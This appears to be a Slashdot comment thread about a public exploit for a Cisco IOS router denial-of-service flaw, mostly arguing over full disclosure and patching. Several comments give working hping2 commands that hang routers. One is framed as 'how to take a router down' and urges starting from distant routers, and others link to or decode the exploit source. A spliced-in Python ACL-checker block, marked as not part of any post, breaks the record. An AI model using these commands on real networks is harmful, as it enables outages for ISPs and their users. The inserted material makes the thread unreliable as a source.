Exploit Available for Cisco IOS Vulnerability
GNUman writes "Cisco's IOS vulnerability, posted by Slashdot and CERT, has now a published exploit available, as reported recently by CERT. While there are some articles claiming that the Internet survived a major flaw, maybe with a publicly available exploit could script kiddies start creating havoc? jerw134 wanted to start a pool to find out when the exploit would be publicly available, here's the answer."
About them Script Kiddies,
the internet's old plight.
Goin' all around,
usin' hacks they didn't write.
Them Script Kiddies lurk the net,
as devious little foes.
Keep them admins well employed,
and keeps them on their toes!
When Script Kiddies learn a trick,
it makes for one tight spot.
If you ain't patched up to date,
think again, because you ought.
How to be a Script Kiddy,
logon the net ad hoc.
Google for the hack you want,
and start your own havoc.
A programmer is a machine for converting coffee into code.
...the 'sploit is more easily available than the fix!
Anyone else gone through hell today trying to get the patch from Cisco?
Grrr... >-/
Hehe, good to see the creator gave admins plenty of time to patch / resolve problems with their Cisco gear...
If you haven't yet received notification from your NOC that they're going to be doing maintenance, you really need to impress upon them to get this fixed. In a nutshell, this flaw could allow a malicious hacker to shut down traffic to your servers.
Want to improve your Karma? Instead of "Post Anonymously", try the "Post Humously" option.
Right, only now the webpage sucks because it's black and white.. ;)
I won't brag about the $10,000 bonus check I received from hitting that benchmark...
:P
Too late. Now how are we supposed to believe the rest of your story?
Now that it's been published, and Slashdot has broadcast it nice and loudly, surely the number of script kiddies planning on making use of this is significantly increasing. Not that I'm complaining about it being known - it'll really make certain people get their behinds in gear to fix it - but I'm sure we'll be seeing how serious of an exploit this is soon.
Let's see if we get significant network outages anywhere on the internet anytime in the next few days/weeks...
"You know your god is man-made when he hates all the same people you do."
You're right on the money with the "maturity" comments, Jack. The way technology has been running, we have been in a constant state of trying to learn something new. We've never really had a chance to get "really good" at some of our technologies, before the next version or replacement technology arrived.
The Cisco situation is not due to bleeding edge issues though. They should have found this problem sooner.
Surely you meant to say Sisqo?
It's also a shame we have to pat ourselves on the back a lot on slashdot. And as long as you're not bragging about $10k bonuses, make sure to not tell us how you didn't spend it on the EFF and FSF. ;-)
Beware he who would deny you access to information,
for in his heart he dreams himself your master.
Ok, maybe it's just me, but why is it that I have to provide Cisco with serial number, date of purchase and the name of my cat to get this fix? I mean - the fix is software, and it will only work on Cisco units. So - for crying out loud - put the patch on an FTP site and get over with it. Jumping through hoops to get the patch isn't going to speed things up.
My employer (U.S. Gov't) is too cheap to buy Cisco equipment! =P
Fascism should more properly be called corporatism because it is the merger of state and corporate power. -- Mussolini
coincidence?
or perhaps someone in my subnet finally figured out how to mirror torrentse.cx?
They'll be creating something but I don't know what. Hopefully it won't resemble havoc.
Thanks,
--
Matt
What kind of graphics were these? They should have been already optimized to allow for quick loading.
Unless you're talking about high quality TIF's B&W vs. Color should not be making a difference in your load times.
-- taking over the world, we are.
Abstracted high-level tools are what gets jobs done. I wouldn't recommend Java, VB, and C# though - Personally I get things done best with Perl.
-toomuchPerl
Once again we see the power of open source! From announced flaw to exploit in two days. Beat that Microshaft!..... Oh.... Wait.... This is not a good thing is it....
Papa Legba come and open the gate
You sir are the best troll who doesn't know he's a troll I've ever seen!!!!
1. No sig. 2. ???? 3. Profit!!!
This was seen as activity on the net last night by some of the MSS firms. It seems post-patching of the Cisco boxes results in higher CPU utilization for a good while. Not sure why yet, but maybe due to all that bad traffic...
Wow, nice troll. I think that deserves a golf clap for your efforts.
*polite applause*
Thanks,
--
Matt
Black and White graphics load on an average Olog(n) faster than color ones? Mel Brooks gave you that formula?
News flash: Web-based technologies change monthly, if not weekly. If we waited for them all to mature, we'd still be viewing Lynx compatible pages.
Also, those of us who build for the web have to deal with an incredibly variable environment (OS, browser, connect speed, screen size, language, etc). Some high level abstraction is necessary, unless we want to target just 1 small audience (sadly, many web developers do so).
Idealism is nice, but standing on a soapbox screaming 'Be Patient!' is not really practical given the tech-o-the-week world that the web is right now.
I don't expect the best social skills (we're geeks, that's not what we do), but you could at least try to see the big picture before you espouse ivory tower philosophies.
(whew, I can feel my karma draining, but it's worth it).
"Faith: Belief without evidence in what is told by one who speaks without knowledge, of things without parallel." - A.B.
WHOA! Apologies -- I replied to the wrong thread. My reply was to the thread starter that, aside from being ridiculous, is obviously a troll.
Thanks,
--
Matt
I've already compiled this and tested against an internal router, fills up the input queue quite nicely. Requires libnet.h
-orbit0r
This guy is pretty well disguised as a troll. This comment gave him away though.
Glad I dodged the bullet, I've got every last router patKL()*$OFD_)#@ [LINK DOWN]
That's a bigger load of bullshhh than I've ever seen before, and that's including all of high school! It's times like these /. needs a 'retarded' moderation.
Thanks heaps.
Regards,
Cisco Systems.
If I'm reading this page correctly, the protocol type of the packet that causes the problem appears to be the PIM protocol:
$ grep 103 /etc/protocols
pim 103 PIM # Protocol Independent Multicast
"I drank what?" -Socrates
> As Leon Brooks sums it up in his famous book "The Mythical Man Month"... Leon hit's the nail right on the head....
It's a shame we don't teach IT people the names of other practitioners in their field, or how to use apostrophes.
That'd be *Fredrick* Brooks.
And Bob.
2*3*3*3*3*11*251
What an insight!!!!!!
I'm sure that the coming site support teams will talk a loooong time about the _real programmer_ guy who's been there before them.... Imagine the following:
- Hey, Joe, how the hell is this page header generated.....ooooooh, an executable....Nice!!!!;o))))
You know, I should agree that the number of people in web programming that don't have a clue what exactly they're doing is significant, but that doesn't mean that you should come with a kernel module every time you want to generate an xml file.....
1. No sig. 2. ???? 3. Profit!!!
Ok, this post really bothers me. In any complex system, there are bound to be bugs. I seriously find it hard to believe that if you tackled something as difficult as networking, spent years working on it, would have a finished product that was 100% error free. The word "mature" is just a label. It is meaningless in reality. I agree with you that people should use the right tool for the job, but comparing switching out color pictures for B&W ones and translating code in to C with routing and switching is like comparing a computer that can win at tic tac toe to a computer that can't be beat at chess. The fact of the matter is, Cisco is used by millions for their networking needs. If you think you can produce a more "mature" product that miraculously has no bugs then please do so. I guarantee you will be a rich man. The unfortunate thing is, that most likely by the time your system is mature, Cisco will have a product out that makes your device obsolete.
Support a great indie game: http://www.abaddon360.com
Today?
RR in upstate NY has been dog-ass slow for 2 days straight now... despite the "network status" page being filled with "area down for cable maintenance/upgrades" for 3 days.
Oh look.. it says there's nothing wrong in my area.. bullshit!
No unauthorized use. Trespassers will be shot. Survivors will be shot again.
were these radical improvements implemented on linux 9.0?
Whereof we cannot speak, thereof we must be silent. --Ludwig Wittgenstein
Importance of shaming those who published this exploit
There was very little time to act upon the new IOS version that Cisco provided to the public. The software upgrades were available to the public on Thursday morning at 00:00. CERT made their announcement about 15 minutes later. Today, the exploit is public. That is less than 48 hours to upgrade the hundreds of thousands (if not million+) Cisco routers across the world.
This is the most important security event affecting the Internet since the root DNS server attacks some time back, and this one is potentially much more severe. I have been surprised at the lack of media attention of this issue, or how some of my technical colleagues have treated it. They don't seem to understand how many Cisco routers are out there.
It needs to be shown that by making the exploit of this vulnerability public so soon, the persons who did this only did so for publicity gain at the expense of others.
They hurt others to profit themselves, and that is no more cool than slavery is. And what did they get out of it? "My dick is bigger than yours."
I just don't want this to pass over and the people who made this exploit public think that what they did was cool, or that they are going to get a lot of admiration or karma for it. If they like the Internet, which they probably do, they just did the most harmful thing to it as they could have possibly done.
1. whois says your web address is not even registered.
2. I wonder what technology really is "mature" before it becomes out-of-date, these days.
You can find the original exploit here.
Imagine your typical packet kiddie running dozens of instances of the following pseudocode on his farm of a few hundred trojaned boxes:
}
If you haven't patched already - do it now.
In this post, he said:
Writing websites in C is generally a very bad idea. It does horrible things to the security - introduces buffer overflow problems. And the speed increase, when it even exists (Java's performance is better than most people think), is not worth the extra programmer time.
In an older post, he said:
...so, apparently, he mostly uses the interpreted languages he just dissed stupidly.
The rest of the post is just stupid buzzwords:
More colors = more information = more time to download, but that O(log n) is stupid and wrong. And the other stuff is even more gibberish. This exploit has nothing to do with web applications, anyway.
Relax. This news has been going around the various vulnerability mailing lists for over a week now. Slashdot is late to the party (rightfully so).
The discoverer notified Cisco and everyone else, but held back on the exploit code until Cisco had a chance to work on it. Now that the word is out as well as the patch, don't waste time here when you should be patching your CATs (or looking for a new job).
sheesh.
I have something in common with Stephen Hawking...
Cisco released the fix two days ago to backbone providers. Other large customers could get the fix early yesterday. If you're affected by this vulnerability and it's not fixed yet:
It seems like Cisco handled this one correctly with the providers. I'm not sure how well large customers were handled, my guess is the .edu folks probably got screwed again.
----- obSig
Great! You replaced their interpreted languages with C! But...
What's the lowly webpage designer going to do when *gasp* they want to change a page? Are they going to have to go down into C source, and have to change it? The webpage designer probably is going to really screw things up because the page needs changing. C may be fast, but for webpage design, it's probably not the right tool. If you have a half-decent server (Resin, for example), Java's not going to be slow. And JSP is going to be MUCH easier to maintain than C.
And as far as black-and-white graphics, I hope the site still looks good... There are other image optimizations that you can do, and that's probably made some of the difference.
Quack, quack.
You say this as if it were a disadvantage. Do you also consider access ramps near buildings to be eye-sores, and do you routinely park your car on the spots reserved for the disabled?
Lemme tell you: lots of people don't use lynx by choice, but because they have a disability (blindness) that prevents them from using other browsers. Text-only browsers may be used together with a braille line, or a text-to-speech synthesizer to enable the blind to experience the web.
Frankly, web designers who pride themselves that their pages are not lynx compatible are dorks.
Also, those of us who build for the web have to deal with an incredibly variable environment (OS, browser, connect speed, screen size, language, etc).
Rather than building specific versions of your page for your target, think of building target-independent pages. Stick to standards. Stick to the "minimality principle": If all you want are buttons with pretty pictures, use gif images, rather than flash animations. Oh, and add an ALT tag too, for the sake of your blind visitors.
Idealism is nice, but standing on a soapbox screaming 'Be Patient!' is not really practical given the tech-o-the-week world that the web is right now.
So, just explain to your management that your "flashy" website exposes your company to multi-million dollar A.D.A. lawsuits. Maybe then they'll understand better.
I just tried this on our routers at work, it does not appear to work. I did n tice som pkt lss but a r nn
Bad boys rape our young girls but Violet gives willingly.
I had the impression that routing was a fairly straight-forward task and that 100% reliable software should be available for the routers. Has Cisco added frills to such an extent that the basic routing is compromised? Is this current problem associated with unnecessary features?
I have 5 25xx's and 2 1601's sitting on my desk until I can get enough ram to run the new fixes.
I really should just pull them out of service, but hey, they work.
You don't read a lot, do you (or don't read the correct mailing lists)? The notification regarding this exploit went out some time ago. The discoverer worked with Cisco, releasing a notification regarding the exploit and some general information regarding cause and severity.
THEY HELD BACK ON THE EXPLOIT CODE UNTIL CISCO COULD DEVISE A PATCH.
Larger customers (ISPs, etc.) were taken care of in advance of the general public notification. Independent parties were no doubt already working on their own exploit code. It's quite common to release the patch and the exploit code at the same time; in fact, some parties prefer to release 0-Day exploit code... let's just be glad these particular folks didn't.
I have something in common with Stephen Hawking...
That's less than 48 hours, depending on which timezone you live in. Should be an interesting weekend for some.
You must be a mac user...get it...CISC blow? Aww never mind...
Any good suggestions on scripting the upgrades? What happens if you have over a few hundred routers? Life sucks I guess.
Back in middle school, where they told us all, "here's exactly what drug x looks like, what it does,and how to get it & use it... but please don't use it. That would be bad!" :) aieee!
4 years later... dang! Why are all the students on crack?
Importance of shaming those who published this exploit
Why? Most ISPs are very grateful to have something to test if their countermeasures are effective.
Do you really want to upgrade all your core routers at once, and take the risk of introducing a bug which brings down your whole network? It's often better to apply some workaround and schedule an incremental update. In this case, you really want to test if your workaround is effective.
Your colleagues don't realize how many Cisco routers are out there? What, are your colleagues monkeys or something? That's like saying they didn't know how many copies of windows are running out there. Man, do I feel sorry for you. How many emails do *you* get a day that consist of "What's my password?" ?
-Looking for a job as a materials chemist or multivariat
No. The webdesigner will create a new page from scratch and toss out the C.
"Last one in is a rotten goblin!" - Kepp
Truly, I'm amazed at the number of things you can identify Olog(n) speed increases in: FreeBSD, custom algorithms, cache hits, Unicode, RISC chips, Extreme Documentation, modern compilers....
That, combined with your uncanny ability to cite "The Mythical Man Month" in every single post as well as to consistently get modded down to "0, Troll" or lower makes me wonder if you even know what log(n) means, or if you just have a BS generator on your computer producing these painfully self-promoting posts.
A big middle finger to all of the idiots that don't believe in full disclosure:
Cisco IOS Exploit
You can also easily create the exploit using hping2.
Here's a link to the source in b64 format, you can extract it with:
openssl base64 -d -in cisco.txt -out cisco.tgz
Happy testing!
/* * pope1 */
Here the exploit: http://www.securitylab.ru/_tools/shadowchode.tar.tar
It's a .tar.gz file, incorrectly named.
:wq
You discovered the ruse. Click here to claim your prize. *
* Prize not guaranteed
Black holes are where the Matrix raised SIGFPE
The following access list is specifically designed to block attack traffic. Note that the attack traffic can include spoofed source addresses. This access list should be applied to all interfaces of the device, and should include topology-specific filters. This could include filtering routing protocol traffic, management protocols, and traffic destined for the internal network. Protocol 103 is Protocol Independent Multicast (PIM), which is a commonly deployed application in multicast networks.
Interfaces with PIM enabled have not been found to be vulnerable to exploit traffic with protocol 103; PIM traffic may be permitted to those select devices.
access-list 101 deny 53 any any
access-list 101 deny 55 any any
access-list 101 deny 77 any any
access-list 101 deny 103 any any
!--- insert any other previously applied ACL entries here
!--- you must permit other protocols through to allow normal
!--- traffic -- previously defined permit lists will work
!--- or you may use the permit ip any any shown here
access-list 101 permit ip any any
= Grow a brain...
In the Cisco workaround they say to deny 53 any any.
Now wouldn't that block all incoming and outgoing DNS lookups?
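As an added example (not code from the advisory or from any post here), a Python checker that parses a numbered IOS access-list and reports whether each of the four protocol numbers in the workaround above hits an unscoped deny before any permit, since IOS stops at the first matching entry. The sample ACL texts and the 192.0.2.0/24 network are constructed; the numbers are IP protocol numbers as in /etc/protocols (53 is SWIPE, 55 MOBILE, 77 SUN-ND, 103 PIM), not TCP/UDP ports, so the deny for 53 is unrelated to DNS.

```python
"""Check a numbered Cisco IOS ACL for the deny entries in the advisory workaround.

Added example; the ACL texts below are constructed to mirror the workaround and
two ways of getting it wrong.
"""
import re

# IP protocol numbers the workaround denies. These are IP protocol numbers as
# listed in /etc/protocols (53 = SWIPE, 55 = MOBILE, 77 = SUN-ND, 103 = PIM),
# not TCP/UDP port numbers, so 'deny 53 any any' does not touch DNS on port 53.
WORKAROUND_PROTOCOLS = {53: "swipe", 55: "mobile", 77: "sun-nd", 103: "pim"}

# access-list <number> <permit|deny> <protocol> <source> <destination> ...
ACL_LINE = re.compile(
    r"^\s*access-list\s+(?P<num>\d+)\s+(?P<action>permit|deny)\s+"
    r"(?P<proto>\S+)\s+(?P<rest>.*?)\s*$"
)


def parse_acl(config_text, acl_number):
    """Return the (action, protocol, rest) entries of one numbered ACL, in order.

    IOS evaluates entries top-down and stops at the first match, so the order
    returned here is the order that matters. Comment lines ('!...') and lines
    belonging to other ACLs are skipped.
    """
    entries = []
    for line in config_text.splitlines():
        if line.lstrip().startswith("!"):
            continue
        m = ACL_LINE.match(line)
        if m and int(m.group("num")) == acl_number:
            rest = " ".join(m.group("rest").split())
            entries.append((m.group("action"), m.group("proto").lower(), rest))
    return entries


def check_workaround(config_text, acl_number, allow_pim=False):
    """Map each workaround protocol number to how the ACL treats it.

    'denied'      an unscoped 'deny <proto> any any' is the first match
    'scoped deny' a deny with a narrower source/destination matched first
    'permitted'   a permit (including 'permit ip any any') matched first
    'no entry'    nothing matched, so only the implicit deny at the end applies
    With allow_pim=True protocol 103 is skipped, per the advisory's note that
    PIM may be permitted on interfaces where PIM is enabled.
    """
    entries = parse_acl(config_text, acl_number)
    result = {}
    for number, name in WORKAROUND_PROTOCOLS.items():
        if number == 103 and allow_pim:
            continue
        status = "no entry"
        for action, proto, rest in entries:
            # 'ip' matches every IP protocol, so a 'permit ip any any' placed
            # above the deny lines silently disables the workaround.
            if proto not in (str(number), name, "ip"):
                continue
            if action == "permit":
                status = "permitted"
            elif rest == "any any":
                status = "denied"
            else:
                status = "scoped deny"
            break
        result[number] = status
    return result


def is_mitigated(config_text, acl_number, allow_pim=False):
    """True only if every checked protocol hits an unscoped deny first."""
    statuses = check_workaround(config_text, acl_number, allow_pim).values()
    return all(s == "denied" for s in statuses)


# Constructed sample: the workaround as published, deny lines before the permit.
GOOD_ACL = """\
access-list 101 deny 53 any any
access-list 101 deny 55 any any
access-list 101 deny 77 any any
access-list 101 deny 103 any any
!--- previously applied entries would go here
access-list 101 permit ip any any
"""

# Constructed sample: the catch-all permit was left at the top, so every
# protocol matches the permit first and the deny lines never fire.
MISORDERED_ACL = """\
access-list 101 permit ip any any
access-list 101 deny 53 any any
access-list 101 deny 55 any any
access-list 101 deny 77 any any
access-list 101 deny 103 any any
"""

# Constructed sample: PIM interface with 103 permitted by keyword, and 77 only
# denied for one (constructed) source network.
PIM_ACL = """\
access-list 101 deny 53 any any
access-list 101 deny 55 any any
access-list 101 deny 77 192.0.2.0 0.0.0.255 any
access-list 101 permit pim any any
access-list 101 permit ip any any
"""

if __name__ == "__main__":
    for label, text in (("good", GOOD_ACL), ("misordered", MISORDERED_ACL),
                        ("pim", PIM_ACL)):
        print(label, check_workaround(text, 101),
              "mitigated:", is_mitigated(text, 101, allow_pim=(label == "pim")))
```

Run it against a `show running-config` capture to see which interface ACLs actually reach the deny lines; an ACL that passes here still needs to be applied to every interface as the advisory says.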
As I mentioned in your other post about this, this is *not* the CatOS patch. Cisco discovered this themselves. The discoverers did have to work with Cisco, since they were Cisco.
No one outside Cisco had seen this until a few days ago. The problem is, once Cisco announced it, there were only so many combinations that could cause the problems they were mentioning, and someone found them, and posted it to Full-Disclosure.
With respect, you're partially right, but only partially, and the half-accurate stance you suggest is both attractive and dangerous.
From a moral and ethical standpoint, yes, many exploit postings are done for bad reasons - to garner street cred, create havoc, etc. (Of course, some are posted to force an issue, or as a necessary part of getting information to those who need it to fix their systems, but that argument can be found in plenty of other places, so no need to rehash it here.)
The thing to remember: from a practical standpoint, none of that matters one #$@% bit. Sure, it would be nice if "they" could be restrained by shame or any number of other things; it would also be nice if everyone's intelligence doubled every year. Bets, anyone?
What's important is dealing with the results, not wishing for stuff that would be nice but is highly unlikely to ever happen. When flaw n shows up, we need to fix it or mitigate it as well as we can. Hopefully we can even learn from the flaw, and avoid similar ones in the future. Or, if we can't avoid getting nailed, we go with a fallback plan. ('Course, if things go badly enough, the only backup plan may be "Make your peace with $ENV{DEITY} && die();" but that's a separate issue. :) )
I'm not saying that shaming a malefactor is a bad thing - if it improves the state of the world, great. However, it won't solve the immediate problem unless you can do it for every case, so for purposes of safety you might as well put effort into something that will actually help. When we're defending systems, we need to assume that attackers will do their worst, then plan and act accordingly. Avoiding a hole in our armor, or patching one when we find out about it, is much more logical than trying to get people to keep quiet about it.
For instance I was able to reduce the load time of a very well known and heavily traveled Fortune 500 website by moving all the graphics to black and white only
sound more like you were working for a satanic cult...
I just realized I made a small error in the above pseudocode. If you successfully hang closer routers you won't have connectivity to more distant ones, so distant routers should be tried first. If the for loop is changed to read for $hopnum ($#hops..5), the effect is much greater assuming an equal number of vulnerable routers.
Patch your vulnerable Cisco gear ASAP!
Without full disclosure, what % of the routers out there would be patched right now? 10? Maybe.
It sounds to me like Cisco needs to get their genius engineers together to come up with a better way to distribute IOS images - one that does not involve e-mail, perhaps!
What the people did _was_ cool. They contacted Cisco a while back. Then they released the exploit almost *2 days* after the patch was announced.
Nice try bringing slavery into this. That's ridiculous.
"most harmful thing to it they could have possibly done." Please. Even if they released it 2 seconds before the patch was available, the Internet may have had instability for a day or two while Cisco ships out CDRs to everyone so they can fix it.
To those that choose full disclosure for security - I applaud you! I really appreciate having a program available that allows me to test if my systems are vulnerable and remain vulnerable post-patching.
I am not against making the exploit public at all -- just not within the first few days of the exploit discovery. Considering the quantity of systems affected and the fact that many Cisco devices are remote makes patching difficult.
Personally, I want to throw the exploit against some of my own equipment just for fun too.
There will be Cisco devices vulnerable to this exploit for years to come. As a consultant, I commonly come across old Cisco routers that have not had their software upgraded in years. Not every sysadmin knows how to deal with a Cisco -- they just pass traffic through it.
There'd been a bunch of stuff going around on FD about it that I was under the impression that the two subjects were related since the effect was largely the same (send specially-crafted packets, port fills up, shuts down, requires reboot of switch).
I still say the release of exploit code is no big deal in this case. As you said, the combos were limited, so anyone with half a clue could figure it out without someone releasing code.
I have something in common with Stephen Hawking...
I like full disclosure -- just not within 48 hours of such a major vulnerability.
Almost two days is not sufficient time given the quantity of systems that this problem affects and the severity of the problem.
News flash: Web-based technologies change monthly, if not weekly. If we waited for them all to mature, we'd still be viewing Lynx compatible pages.
...and what would be so wrong with that? I was reading slashdot yesterday with lynx. Unless there is a bloody good reason for a site to be chock-full of graphics (e.g. a pr0n site, or one with photos illustrating "how to do X", etc.) it should be accessible to lynx. Why? Well, if you want your information to be available to the widest number of people possible, you have plenty of text. If you want your page to load fast, you have plenty of text.
"Weapons should be hardy rather than decorative" - Miyamoto Musashi
I think that goes for OS's too
why don't you just apply the workaround (block the 'exotic' protocols) ?
#include "coucou.h"
I think your sig should be "Thomas J. Advertisement interim CEO/Founder/Shameless Slashdot Shill - Melior, Inc."
It IS a disadvantage.
Most folks do not still want text only pages. I know that this is a raw deal for blind folks and the like. The fact is, most clients are not interested in websites that look like they are from 1996.
I actually try to build 2 years behind, so older browsers can handle my code, and a reasonable amount of time for upgrades is allowed.
I am a _huge_ believer in standards, actually, but dealing with clients (in both business and browser sense) that are not is exceptionally difficult.
Unfortunately, web technology was not designed for the disabled to use easily. This is slowly being worked on now, but it's not something that will be fixed overnight. Again, that's a pretty shitty deal, but it is what it is.
I understand your anger, although I think you misunderstand me; you might be better off _not_ assuming malice or insensitivity on my part. You would also be mistaken in assuming that I make 'flashy' sites. I try to make them as usable as possible. Good developers/designers will do that. But it is impossible to cater to all possible audiences right now.
Your points are good, but bear in mind the complexity of the situation before assuming that I'm just some insensitive bastard, ok?
"Faith: Belief without evidence in what is told by one who speaks without knowledge, of things without parallel." - A.B.
Then I don't get fancy new gear!
The standard for web development has moved past Lynx. You may not like it, but 'tis true.
Incidentally, few websites expect the 'widest number of people possible' to visit. Most have a fairly specific demographic.
Ok, someone call off the Lynx hounds!!!
"Faith: Belief without evidence in what is told by one who speaks without knowledge, of things without parallel." - A.B.
For those of you who are attempting to work around this, and happen to have hping2, here's how to do it. To get the TTL, just ping the destination and subtract from 255, for instance a ping with TTL 251, you'd enter 4. Choose which protocol to use of the four.
/dev/urandom
hping2 (dest ip) -0 -t (ttl from above) -H (53,55,77, 103) -d 128 -E
The CatOS bug only kills management traffic to the router - telnet, ssh, http, etc. Traffic going *through* the router remains unaffected.
The IOS bug causes the affected interface to drop all incoming traffic, management or production.
Now it's possible that a common bug could have caused both, and it's also possible that the CatOS bug prompted Cisco to take a closer look at the IOS code and led to the discovery of this one. But by all accounts, the IOS bug was discovered internally by Cisco engineers. The exploit was found by someone else after the vulnerability was announced.
Ah, but the insightful one gets the point :)
"Faith: Belief without evidence in what is told by one who speaks without knowledge, of things without parallel." - A.B.
Here's how to take a router down:
/dev/urandom
Assuming you're using debian.
apt-get install hping2
ping
Subtract x in ttl=x from 255
then run:
hping2 -t -H 55 -d 128 -E
enjoy...
and remember.. if you take down your ISPs gateway first you won't be able to do further damage.. start from the outside in.
Um... yeah, ok. Misusing that metaphor isn't making the point, and I'm tired of this. fuck off.
"Faith: Belief without evidence in what is told by one who speaks without knowledge, of things without parallel." - A.B.
If you look at the release dates of some of the code that is not vulnerable to this attack, it goes back to early June. To me, it looks like this was identified almost two months ago. The question then is: Was this suddenly announced once a planned mile-marker in IOS revisions had been met....or once they suspected the exploit was in the wild?
That is less than 48 hours to upgrade the hundreds of thousands (if not million+) Cisco routers across the world.
So do them in parallel.
Hell, give me access. I'll upgrade a few million routers in less than 48 hours, no prob.
And I am a lazy pothead sys admin. I don't even work on routers.
I love his misuse of big O notation. Olog(n) faster? What, by the size of the picture? No, because if you change a constant value (bits per pixel) it will have a constant, not logarithmic, effect on the size.
Image has 1000 pixels with 32 bit colors per pixel no compression: Size = 1000x32bits = 32000 bits.
Image has 1000 pixels with 2 bits of color per pixel (although 8 bit greyscale would be better) = 2000 bits.
Now it seems a full color image is 16x larger than the bw one; if you change the number of pixels the savings in size will be constant.
Everyone that disagrees with me is a paid shill
Why does the author put "(void)" before every fprintf()? Can it be some kind of hidden signature?
How is this a big middle finger to people that don't believe full disclosure is a good idea for something of this gravity? Major ISP's and Major providers (for which I work) didn't hear about this but 48 hours before the exploit was made public.
Cisco tried their hardest to prevent info from getting out to make it easy to create an exploit, but data was leaked. What has this done? It's left hundreds of thousands to millions of routers, with not nearly enough admins to patch, vulnerable to the losers who have already posted (in reply to your message no less) "Is there a win9x version?". What do you think HE is going to do with it? Test his network? Hah!
I believe in full disclosure, and I wish that I had been more in the know during this process, but I have to ask myself why? I wanted to be more in the know so that I could feel more important than other people. Boy, that's selfish. Maybe you should consider that there are more important things than getting a 'sploit -- like giving the INTERNET an opportunity to respond to a major threat.
That, or you could be segmented from your favorite pr0n site. Your choice.
Tell me, Jack, is daylight savings time right around the corner? ;o)
here
" I'm going to say an exploit by tomorrow. End of the internet by Sat. All back to normal on Monday"
Rus
Cheap UK and US VPS
worked against my 1005.. sadly :P)
As I first saw this, and figured you'd mis-spelled 10053, because there really SHOULD be an "e" at the end... Then realized that "loose" doesn't fit in the sentence.
Ah well. Stupid me.
-Ben
I have no problem with your religion until you decide it's reason to deprive others of the truth.
So far it has been 4 hours since my e-mail... no response whatsoever
Lemme guess.
Your request for help to cisco.com is not really going to go to 198.133.219.25 but to, uhm, a new different, uh, help center, that will be happy to send you an IOS sploit^H^H^H^H^H^H update to have you up and going in a jiffy.
"Provided by the management for your protection."
The 2500 series has been EOL'd. May want to check their web site and use it to justify new 2600XM's (the non-XM 2600's are also EOL'd, so I wouldn't recommend purchasing them).
You serious? Sure, go nuts. I look forward to seeing what happens when the build you pick for a router three hops down doesn't support the STM-4 card you had in there, and stops you reaching the 20 networks behind it. Oh, and there's one over here that's running a new build with a BGP bug, so these 100 have fallen off the network. And three of these six in New York just plain didn't come back, we're not sure why yet. You've got out of band access to them all, right? right?
Upgrade with care. Even the most reliable kit develops problems a small percentage of the time; a small percentage of a lot of kit is a lot of kit.
Dave
What incentive would we have to defend ourselves if we didn't have predators to threaten us?
Sounds like smarter living through adoption of stupidity, and a long way around the block if you ask me.
Maybe corporations need to think a little longer and a little harder before they downsize their IT staff? :)
I was contacted last night by UUnet, and tonight they are adding ACLS to all of my edge routers.
:) I love outsourcing.
Myself, I'm drinking a beer.
Well, I would hope that if one is running a shop with a large quantity of Cisco boxes, one would have taken the necessary time to lock down these boxes to prevent unnecessary access to them. Whether it means setting up ACLs at the edge of your network to prevent bogus/unauthorized access to the devices/interfaces, or ACLs on the boxen themselves, this should have been done a long time ago. Granted, you don't want excessive (or any, for that matter) ACLs on your core router. A good engineer, IMNSHO, would have limited the amount of protocols/sources accepted by critical pieces of infrastructure. ;-)
As an aside, what is a good time to release the exploit into the wild? What if the exploit was exploited _prior_ to Cisco getting the word out on the recommended fix? Would you have preferred 72 hours, or maybe after you returned from your summer vacation?
I would presume s/he's casting it to type void so that a very pedantic person wouldn't complain about her/his not checking the return status.
The truth of the matter is that Cisco is not the only network equipment maker out there. And there's a good chance that a lot of routing code that IS out there is shared by several different vendors' equipment. How could makers of non-Cisco equipment test their equipment to ensure that it doesn't suffer the same flaw without any specific details and without an exploit? How could customers who own non-Cisco equipment be sure that their networks are safe?
Despite what EULAs say, most software is sold, not licensed.
I just have to hold out a little bit longer! The economy's going to pick up, and we'll all be riding on the edge of the dot-com bubble again. We'll all be millionaires! And then, Cisco 7000's for everyone!
Bob Brooks (dear old Dad) has made significant contributions in the Australian mining industry, his twin Colin Brooks is a well-known consulting geologist, their brother Don Brooks runs Harvestaire, and grandpa Charles Alfred Brooks made himself famous for finding things out about sports that helped people to do them better, but yes, the man you really want is Fred Brooks, famous for statements like "adding manpower to a late project makes it later".
:-)
My main claim to fame seems to be for abusing people in public (-: For which I am indebted to several skilled exemplars, who probably all know who they are
Kudos to Russel Steicke for pointing out this post to me.
Got time? Spend some of it coding or testing
Maybe, but in reality, what's happened here is a vendor has just come to you and said, "Hi there! Guess what, there's been a bug in our code since day one, an amazingly simple little thing that no one has noticed till now. You should trust us to find these things earlier, but we've violated that trust and proven that we're no good at catching bugs in IOS. The fix is to run this sparkly new IOS that no one has ever used before! Please, install this on all your routers and switches within the next 36 hours because there's gonna be an exploit out."
The first thing that any logical person who's dealt with a vendor in the past must think is, "Oh crap, new, untested version that I have to deploy to all of the routers across my enterprise within 36 hours. There's a good chance that this vendor who has proven they can't catch bugs is going to have another bug in the software, causing my network to crash".
In this case, it doesn't matter how many members of the IT staff you have or don't have. If they were able to keep their information closer to the vest for another week or two (which they were trying to do, but people who believe in immediate full disclosure decided to derail that), businesses would have been able to burn in the new code to make sure that all of their requirements are met and that there are no other bugs that regression testing would have found.
I am in CCNA training right now (Sem 3 done), and I can bring a router from nothing to fully operational using different protocols and routing methods in a short matter of time. I don't know how to make a specially crafted IPv4 packet. Anybody know how to do this? And does anybody know the code to the said packet? Or is this just a specially long packet? I'm curious.
I got nothin'.
You're right, I was talking out my ass.
;)
But I bet maybe you and I could do it, with enough time, a database of details and perl/expect.
There are only a certain number of possible combinations of Cisco router hardware. If we knew their current state of hardware and software revisions, it should be possible to custom build an IOS PROM or patch the existing OS to bring it in line with production.
Well, that's the way I look at these things. Let the software hash out the details, just make sure you get all the bases covered and run the script through intensive QA before deployment.
I bet a Cisco CCIE could do it. They can do anything.
Ingress filtering on a Cisco via ACLs is only effective on the 75xx class routers.
On other Cisco IOS products, the input queue processing precedes the ACL processing, so these devices can be DoS'd no matter what ACLs are in place.
You should contact Cisco PSIRT and tell them to correct their advisory if this is really the case.
Thanks for being honest. :D I gotta admit, I was feeling a bit ratty last night when I posted too.
I've got an 8-hour day planned tomorrow (Sunday) to upgrade our network at work, and we're looking at that much time just to do the critical boxes (20-odd) with leeway for funnies, and in an order that lets us recover if it goes to shit somewhere. We'll be doing a little parallel stuff, but not much. In theory I could upload the IOSes to the flash cards tonight, log in tomorrow from home and run ./reload-all -- but I'd be a bit screwed if any one of them had a funny I didn't know about.
:)
